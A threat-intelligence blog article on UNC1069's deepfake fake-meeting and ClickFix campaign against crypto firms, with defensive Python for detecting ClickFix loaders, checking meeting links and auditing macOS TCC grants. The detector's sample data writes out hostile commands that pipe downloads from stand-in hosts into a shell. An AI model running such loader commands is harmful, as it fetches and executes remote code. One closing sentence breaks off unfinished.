How North Korea-Linked UNC1069 Hackers Use AI Deepfakes to Target Crypto Organizations
UNC1069, a hacking group tied to North Korea, is hitting the cryptocurrency sector hard. It lures targets into fake video meetings built on AI-generated video, then talks them into running a command that installs credential-stealing malware on Windows and macOS. The campaign shows how a nation-state actor folds new technology into old-fashioned social engineering against crypto firms.
Who is UNC1069 and Why Do They Target Crypto?
UNC1069 has been active since at least 2018 and is also tracked as CryptoCore and MASAN. The group leans heavily on social engineering, tricking people into actions that hand over access, and its main goal is to steal cryptocurrency to fund North Korea.
Its targets have shifted over time. Before 2023 it went after banks and traditional finance. Since then it has focused on Web3: crypto exchanges, software vendors, tech companies and venture capital funds. Why crypto? The money is there, and a stolen wallet or set of login credentials can turn into a huge payout in a single transaction.
The Sneaky Attack Step by Step
The attack starts on Telegram. The hackers pose as well-known investors, or use hijacked accounts belonging to real startup founders, to chat up victims, typically crypto startup employees or developers, and propose a quick 30-minute meeting booked through Calendly.
Click the meeting link and you land on a fake site such as zoom.uswe05[.]us that looks exactly like Zoom. You turn on your camera, type your name and see what appears to be a live call. It is not live: it is either AI-generated deepfake video or footage recorded from earlier victims' webcams.
- Fake Zoom page: a close copy of the real Zoom join page.
- Deepfake videos: AI tools such as Gemini are used to make realistic clips of fake participants.
- Stolen footage: your own webcam can be recorded during the "call" and replayed against the next target.
After the "call", a fake error appears: "Audio problem! Run this fix." This is the ClickFix technique: the victim is walked through pasting a command into a terminal (or the Windows Run dialog), and that command fetches and installs the malware.
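The ClickFix step leaves a distinctive trace: an interactive shell or launcher spawning a download that is piped straight into another shell. The detector below is an added example written for this article, not UNC1069 tooling or any vendor's rule; the process events it scans are constructed to look like EDR or unified-log output and are not real telemetry. The regexes cover the common loader shapes on both platforms the article mentions (curl or wget piped to sh, base64 decoded into sh, osascript running a shell command, mshta fetching a URL, encoded PowerShell) and mark hits whose parent is a user-facing process, which is what separates ClickFix from automated execution.

```python
import re

# Constructed sample of process-start events (parent process, command line), standing in
# for what an EDR or macOS unified-log pipeline would hand over. Not real telemetry.
SAMPLE_EVENTS = [
    ("Terminal", "curl -fsSL https://example.invalid/audio-fix.sh | bash"),
    ("Terminal", "echo Y3VybCAtcyBodHRwOi8vMTAuMC4wLjEvYSB8IHNo | base64 -d | sh"),
    ("Terminal", "osascript -e 'do shell script \"curl -s http://10.0.0.1/a | sh\"'"),
    ("explorer.exe", "mshta http://example.invalid/audio-fix"),
    ("explorer.exe", "powershell -w hidden -enc SQBFAFgAIAAo..."),
    ("Terminal", "git status"),
    ("Terminal", "brew install --cask zoom"),
    ("Terminal", "ls -la"),
]

# Parents that mean a human typed or pasted the command: the defining trait of ClickFix,
# where the victim runs the loader themselves after a fake "fix" prompt.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "explorer.exe", "cmd.exe"}

CLICKFIX_PATTERNS = {
    "download piped straight into a shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    "base64 decoded into a shell": re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b"),
    "osascript running a shell command": re.compile(r"\bosascript\b.*do shell script"),
    "mshta fetching a remote script": re.compile(r"\bmshta(\.exe)?\s+https?://", re.I),
    "encoded PowerShell command": re.compile(
        r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I),
}


def find_clickfix(events):
    """Return one hit per command line that matches a ClickFix loader pattern.

    Each hit lists every pattern that fired and whether the parent was an interactive
    process (a user-run command), so a triage queue can sort the user-run ones first.
    """
    hits = []
    for parent, cmdline in events:
        reasons = [name for name, rx in CLICKFIX_PATTERNS.items() if rx.search(cmdline)]
        if reasons:
            hits.append({
                "parent": parent,
                "cmdline": cmdline,
                "reasons": reasons,
                "user_run": parent in INTERACTIVE_PARENTS,
            })
    return hits


if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        flag = "USER-RUN" if hit["user_run"] else "        "
        print(f"{flag} {hit['parent']:<13} {hit['cmdline'][:58]:<58} <- {', '.join(hit['reasons'])}")
```

Against the constructed events, the five loader-style commands are flagged and the three ordinary ones (git, brew, ls) are not; the osascript line fires two patterns because its embedded shell command is itself a curl-to-sh pipe. In production, feed the function from your EDR's process-creation stream and tune INTERACTIVE_PARENTS to the terminals your fleet actually uses.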
New Malware Weapons in Their Arsenal
Once the command runs, UNC1069 can drop up to seven malware families on a single machine. Several are new, a sign that the group's tooling is still maturing.
| Malware Name | What It Does | Platform / Targets |
|---|---|---|
| WAVESHAPER | Gathers system info, drops more tools | macOS (Mach-O binary launched via AppleScript) |
| HYPERCALL | Downloader for extra payloads | macOS |
| DEEPBREATH | Steals credentials by tampering with the TCC database | macOS: iCloud Keychain, Chrome, Brave, Edge, Telegram, Apple Notes |
| CHROMEPUSH | Browser extension stealer plus keylogger | Chrome, Brave (posing as a Google Docs editor extension) |
| SILENCELIFT | New family for data theft | Various |
| SUGARLOADER | Known downloader | Windows/macOS |
| BIGMACHO | Backdoor posing as a Zoom SDK | Crypto victims |
These tools grab passwords, cookies and session tokens, everything needed to raid crypto accounts. A single machine can be hit with all of them, which shows how serious the group is about getting the funds out.
AI Makes It Scarier: Deepfakes and Code Gen
What’s new? AI. UNC1069 uses tools like Gemini to:
- Create fake messages and lures about crypto deals.
- Make deepfake images and videos of crypto pros.
- Even write code for stealing crypto.
Deepfakes make you believe you are talking to a real VC from a top firm. The broken grammar that used to give phishing away is gone; AI produces fluent, professional lures. The move to AI-generated lures is a big step up from old-style spear-phishing.
Some researchers call this mix of social engineering, fake meetings and AI video GhostCall. Video captured from one victim is recycled as the bait for the next, so each compromise feeds the following one.
Why Crypto Firms Are Prime Targets
Crypto is attractive: billions in play and lighter regulation than banks face. The hackers go after:
- Centralized exchanges (CEX).
- Devs building wallets or protocols.
- VCs funding blockchain projects.
Steal one session token and a hot wallet can be drained. North Korea has stolen over $3 billion in crypto since 2017, according to published estimates, and UNC1069 adds to that total.
How to Protect Your Crypto Organization
Don’t be the next victim. Simple steps work:
Spot the Tricks
- Verify Telegram contacts out of band: confirm the person through the firm's official website or a number you already have, never through the chat itself.
- Check the link before you click: a real Zoom link ends in zoom.us (subdomains such as us05web.zoom.us are fine), not a lookalike such as zoom.uswe05[.]us.
- Never join from a link pasted in chat: open the Zoom client or zoom.us yourself and enter the meeting ID, and keep your camera off until you have confirmed who is on the call.
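The "check the link" advice is easy to get wrong by eye, because the lure domain in this campaign puts the word zoom in front of an unrelated registrable domain. Here is an added example, written for this article rather than taken from it, of the check a mail or chat gateway could apply before a meeting link is shown to a user. It treats only the registrable domain zoom.us (an assumption; add your own conferencing domains) as trusted, requires https, strips userinfo and port before looking at the host, and rejects punycode or non-ASCII hosts that could hide a homoglyph. The two-label rule for the registrable domain is a simplification that is exact for zoom.us; for suffixes like co.uk you would consult a public suffix list.

```python
from urllib.parse import urlsplit

# Registrable domains this organisation accepts for meeting links (assumption for the example).
TRUSTED_MEETING_DOMAINS = {"zoom.us"}


def classify_meeting_link(url: str) -> tuple[bool, str]:
    """Return (trusted, reason) for a meeting URL found in a chat message or invite."""
    try:
        parts = urlsplit(url.strip())
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() != "https":
        return False, f"scheme is {parts.scheme or 'missing'!r}, expected https"
    host = parts.hostname  # lowercased, with any user@ prefix and :port removed
    if not host:
        return False, "no host in URL"
    if not host.isascii() or host.startswith("xn--") or ".xn--" in host:
        return False, "non-ASCII or punycode host (possible homoglyph)"
    labels = host.rstrip(".").split(".")
    if len(labels) < 2:
        return False, "host is not fully qualified"
    # Simplification: registrable domain = last two labels (exact for zoom.us).
    registrable = ".".join(labels[-2:])
    if registrable in TRUSTED_MEETING_DOMAINS:
        return True, f"registrable domain {registrable} is trusted"
    # Call out the lookalike trick used here: a trusted brand name buried in a foreign host.
    for trusted in TRUSTED_MEETING_DOMAINS:
        brand = trusted.split(".")[0]
        if brand in host:
            return False, f"'{brand}' appears in host but registrable domain is {registrable}"
    return False, f"registrable domain {registrable} is not trusted"


# Constructed sample links: one real-looking Zoom host, the lure pattern from this
# campaign, and a few classic URL tricks.
SAMPLE_LINKS = [
    "https://us05web.zoom.us/j/1234567890?pwd=abc",
    "https://zoom.uswe05.us/j/1234567890",
    "https://zoom.us.evil.example/j/1",
    "https://zoom.us@evil.example/j/1",
    "http://zoom.us/j/1",
    "https://ZOOM.US:443/j/1",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        ok, why = classify_meeting_link(link)
        print(f"{'OK  ' if ok else 'FAIL'} {link:<45} {why}")
```

Only the us05web.zoom.us and ZOOM.US:443 links pass; zoom.uswe05.us and zoom.us.evil.example are rejected as lookalikes, the zoom.us@evil.example form is rejected because the real host is after the @, and the plain http link fails the scheme check.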
Tech Defenses
- Endpoint protection: block or alert on ClickFix patterns, such as a terminal spawning curl or osascript piped into a shell, or an encoded PowerShell command launched from the Run dialog.
- Browser extensions: review every installed extension and restrict installs by policy; CHROMEPUSH hides as a Google Docs editor.
- TCC on macOS: lock down privacy permissions with MDM and audit the TCC database for unexpected grants; DEEPBREATH tampers with it to reach the Keychain and browser data.
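Because DEEPBREATH works by tampering with the TCC database, the grants recorded there are worth auditing rather than just locking down. The audit below is an added example written for this article, not a tool from the reporting or from Apple. It builds an in-memory SQLite table with a simplified version of TCC.db's access table (an assumption: only the columns the audit needs, with constructed rows) and flags sensitive services such as Full Disk Access or Accessibility granted to a client outside an allowlist, to a path-based client such as an interpreter or an unsigned binary rather than a signed bundle, or within the last hour.

```python
import sqlite3
import time

# TCC services whose grant is enough to read the Keychain, browser profiles or other
# protected data, or to drive other apps. These are Apple's real service identifiers.
SENSITIVE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles",  # Full Disk Access
    "kTCCServiceScreenCapture",
    "kTCCServiceAccessibility",
    "kTCCServiceAppleEvents",           # scripting other apps, e.g. via osascript
}
ALLOWED = (2, 3)  # auth_value: 0 denied, 1 unknown, 2 allowed, 3 limited


def load_constructed_tcc_db():
    """Build an in-memory database with a simplified TCC.db 'access' table.

    Assumption: only the columns this audit needs (the real table has more). All rows
    are constructed for the example.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
        "auth_value INTEGER, last_modified INTEGER)"
    )
    now = int(time.time())
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?)", [
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, now - 90 * 86400),
        ("kTCCServiceScreenCapture", "us.zoom.xos", 0, 2, now - 30 * 86400),
        ("kTCCServiceCamera", "us.zoom.xos", 0, 2, now - 30 * 86400),
        ("kTCCServiceSystemPolicyAllFiles", "com.evil.updater", 0, 0, now - 100),
        # Constructed rows of the kind a TCC tamper would leave behind (hypothetical path).
        ("kTCCServiceSystemPolicyAllFiles", "/usr/bin/osascript", 1, 2, now - 600),
        ("kTCCServiceAccessibility", "/Users/dev/Library/Caches/.zoomsdk/helper", 1, 2, now - 500),
    ])
    return conn


def audit_tcc(conn, allowlist, recent_seconds=3600, now=None):
    """Flag sensitive grants that are off-allowlist, path-based, or recent.

    client_type 0 is a bundle identifier; 1 is an absolute path, which is how an
    interpreter or a dropped binary shows up.
    """
    now = int(time.time()) if now is None else now
    findings = []
    rows = conn.execute(
        "SELECT service, client, client_type, auth_value, last_modified "
        "FROM access WHERE auth_value IN (?, ?) ORDER BY rowid", ALLOWED)
    for service, client, client_type, auth_value, modified in rows:
        if service not in SENSITIVE_SERVICES:
            continue
        reasons = []
        if client not in allowlist:
            reasons.append("client not on allowlist")
        if client_type == 1:
            reasons.append("path-based client rather than a signed bundle")
        if now - modified < recent_seconds:
            reasons.append(f"granted in the last {recent_seconds // 60} minutes")
        if reasons:
            findings.append({"service": service, "client": client, "reasons": reasons})
    return findings


if __name__ == "__main__":
    db = load_constructed_tcc_db()
    for f in audit_tcc(db, allowlist={"com.apple.Terminal", "us.zoom.xos"}):
        print(f"{f['service']:<35} {f['client']:<50} {'; '.join(f['reasons'])}")
```

On the constructed data, only the two path-based, recently added grants are reported; Terminal's long-standing Full Disk Access and Zoom's screen-capture grant are on the allowlist and stay quiet, and the denied com.evil.updater row is ignored because a denial is not a grant. To run this against a real Mac, open the user database at ~/Library/Application Support/com.apple.TCC/TCC.db or the system one under /Library/Application Support/com.apple.TCC/ read-only (sqlite3.connect with a file: URI and mode=ro); the reading process itself needs Full Disk Access, which is why a fleet-wide version of this check normally runs from an MDM or EDR agent.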
Training and Tools
- Train staff on deepfakes: look for glitches, and treat any "join from this link" request as suspect.
- Use multi-factor authentication (MFA) everywhere, preferably phishing-resistant methods.
- Keep large balances in air-gapped or hardware wallets.
- Monitor for the malware families above, including DEEPBREATH, with up-to-date detection signatures.
Invest in AI security too: tools that spot deepfakes.
The Bigger Picture: Nation-State Threats in Web3
UNC1069 isn't alone; North Korea runs several groups that hit crypto. This campaign shows the evolution from phishing emails to AI-driven chats and fake calls. Web3 must raise its security or lose users' trust.
Stay alert. Share intel in crypto communities. The fight against
Final Thoughts
What do you think? Drop a comment on how you’re securing against AI phishing.